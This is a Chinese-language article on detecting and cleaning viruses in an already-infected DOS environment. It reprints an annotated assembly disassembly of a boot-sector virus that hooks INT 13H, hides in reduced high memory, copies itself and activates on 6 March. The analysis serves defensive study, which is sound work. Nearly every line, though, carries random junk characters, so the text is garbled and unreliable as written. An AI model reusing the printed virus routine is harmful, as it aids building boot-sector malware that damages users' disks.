近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。
/KAlK5<
?? }&1Iyb
?? 一 、 带毒环境下检测清除病毒的意义 9mQ#L<Ps
?? yLW/ -%I#u
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 $&IpX M]
?? z5 Bi=~=#
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 @F?=a*s"!
?? gv9=quG
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。
a"QU:<-v
?? =O,JAR"ug
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 R*yU<9Mm8
?? Z v4<b
?? 二 、带毒环境下检测清除病毒的原理 [h4o7
?? =D].`
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 ~Eq \DK
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 ]M3#3Ha"
"<*awWNI
-u|l}}bh
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " -l
"U"U"F
病毒体: 0 O~p7D
JMP 01AF ;JMP到01AF 5@ foxI
DB 00 ;病毒标计 :M j_2
DW 00F5 ;此为搬到高位址后,远程跳转指令 ^Gq5ig1rxy
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX 8%[HYgd5)
DB 02 Q2eXK[?*
DW 0003 ;此为软盘识别标记,硬盘为0007 kJk xx*:u
DW EC59 ; cn%2OP:L^
DW F000 ;INT 13H的原入口 Sj)}qM-y#
.
: tM?%=Q
. b{RqwV5P
. ?U_9{}r
. ~GG?GB
. Gy!P,a)z
XOR AX,AX ;清除AX bD<qNqX$
MOV DS,AX; ;让DS=0000 }E; F)=E
CLI ;清I标志积存器 S5_t1wqBJ
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 6e .v&f7(
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 [9V]On
MOV SP,AX ;开机时为0000:7CB6 F}U5d^!2
STI ;设I标志积存器 #dc1pfL!y{
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A )p8I@E
PUSH AX ;用RETF,把程序转到引导或分区表位置 B,_`btJh
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 ''S&e
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 \&a.}t
MOV AX,[004E] ;取INT 13H的段地址 .
uR M{Bs
MOV [7C0C],AX ;存到010C m=TJDr-
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 i"HgvBHx
;读写以便传播发作 9cd 8=][
K)S;:MLG=
MOV AX,[0413] ;取得内存K数,放在AX .0|=[|
DEC AX ; Q>8pP \ho
DEC AX ;减2k内存 [;KmT{I9
MOV [0413],AX ;存回,通常是638K st/n"HQ
MOV CL,06 ; gWrAUPS[
SHL AX,CL ; n|i"S`
MOV ES,AX ;算出减2K后病毒本体的位址 nxaT.uFd1
MOV [7C05],AX ;AX存入0105 wqD5d
\iU] s\{).
;病毒常用手法将系统高段内存减少以便驻留 8~ #M{}
;这样可以免于被其他程序覆盖 uLN[*D
_8><| 3d
MOV AX,000E ;病毒拦INT 13H )NT5yF,m
;ISR起始的偏移量 n.hElgkUOr
MOV [004C],AX ; 59*M"1['Q
MOV [004E],ES ;设原为病毒的INT 13H KrKu7]If6#
MOV CX,01BE ;病毒长度为1BE ;;V\"7q'
MOV SI,7C00 ;从JMP 01AF开始 KWhZ +i`
XOR DI,DI ;DI=0 - 8bNQU
CLD ;清方向标志 }rbZ&IN\?E
REPZ; e*]r
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 jtKn3m7 +p
CS: ;分区表能载入0000:7C00正常运作 :gI.l1
JMP FAR [7C03] ;跳到为搬过后的位址 a3@w|KLt
XOR AX,AX ;清AX lj2=._@R
MOV ES,AX ;ES=0000 tNnyue{p
INT 13 ;复位磁盘 ;/LD)$_
PUSH CS ; u+D[_yd^
POP DS ;让DS=CS x*}bo))hb
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 }!)F9r@\
MOV BX,7C00 ;读到0000:7C00 8]< f$3.
MOV CX,[0008] ;硬盘第0道,第7扇区 0{) $SY
CMP CX,+07 ;比较是否从硬盘启动 4vdNMV~
JNZ 0213 ;不是跳0213 'iUg[{'+
MOV DX,0080 ;第一硬盘C:第零面 feEMg
INT 13 ;用INT 13号中断,读 0^~\COa
JMP 023E ;跳023E比较日期,发作或正常开机 .Q>!B?)
MOV CX,[0008] ;软盘0道,第3扇区 &ZJgQ-Pc(m
MOV DX,0100 ;A:的第0面 ^#e~g/
INT 13 ;INT 13读盘 Veji^-0E
JB 023E ;失败跳023E rt4Z;
PUSH CS O~@fXMthh
POPES ;让ES=CS 8Fq_i-u
MOV AX,0201 ;
xh0 xSqDM
MOV BX,0200 ; T_#,
A0 G
MOV CX,0001 ; -<N&0F4|*
MOV DX,0080 ; K`k'}(vj
INT 13 ;读入C:的分区表到0200,以便下面比较 nWWM2v
JB 023E ;失败跳023E 8`v$liH
XOR SI,SI ;清SI H?yE3w
CLD ;清方向标志以便比较 Q:MhjkOr}
LODSW ;载入一个WORD到AX kzO&24
CMP AX,[BX] ;比较有无病毒存在..E9AC 'Qn~H[$/p
JNZ 0287 ;没有则跳0287传染 )`HA::
LODSW ;载入一个WORD到AX .g% Y@r)=5
CMP AX,[BX+02] ;再次确认..0000 vtxvS3
JNZ 0287 ;没有跳0287 |L:Cn J
XOR CX,CX ;清CX zAScRg$:?
MOV AH,04 ; >V;,#5F_
INT 1A ;取得日期 qv+R:YYOq
CMP DX,0306 ;是否为三月六日 Bjj<\8^M
JZ 024B ;是跳024B传染 UUtbD&\
RETF ;把程序交还给引导启动完成 <I=$ry6 8
cHD%{xlb
步骤4:病毒INT 13代码分析 -_8*41
方法:U ?o[L7JI
PUSH DS ;首先把要用到积存器 lDc;__}Ws
PUSH AX ;入栈保存 . (`3JQ2s
OR DL,DL ;比较是否为软盘
lCb+{OB
JNZ 002F ;如不是则退出传染 y79qwM.
XOR AX,AX ;AX=0 c-CYdi@
MOV DS,AX ;数据代段=0 y' x F0
TEST BYTE PTR [043F],01 ;比较是否为A盘 @q8an
JNZ 002F ;不是则退出 !3}deY8;#
POP AX ;将以上保存积存器 >HTbegi
POP DS ;弹栈恢复 IcF@F>>
PUSHF ;压栈标志积存器 85 ]SC$
CS: ;以便执行原INT 13 :tGYs8UK
CALL FAR [000A] ;执行原INT 13 61K"(r~
PUSHF ;再次压栈 ..KwTf
CALL 0036 ;以便跳转到传染程序 ;+Yi.Q/\
POPF ;跳转到执行传染 LSd*|3E}n
RETF 0002 ;结束中断调用返回 Y=B3q8l5
POP AX ;恢复 py<_HyJ
POP DS ;堆栈 \2X$C#8E
CS: ;跳转到原正常INT 13 F 3RB
JMP FAR [000A] ;地址执行 s&
yk
=mt?Cn}
;此段代码中展现了病毒常用手法,利用标志积存器做跳转
CjL<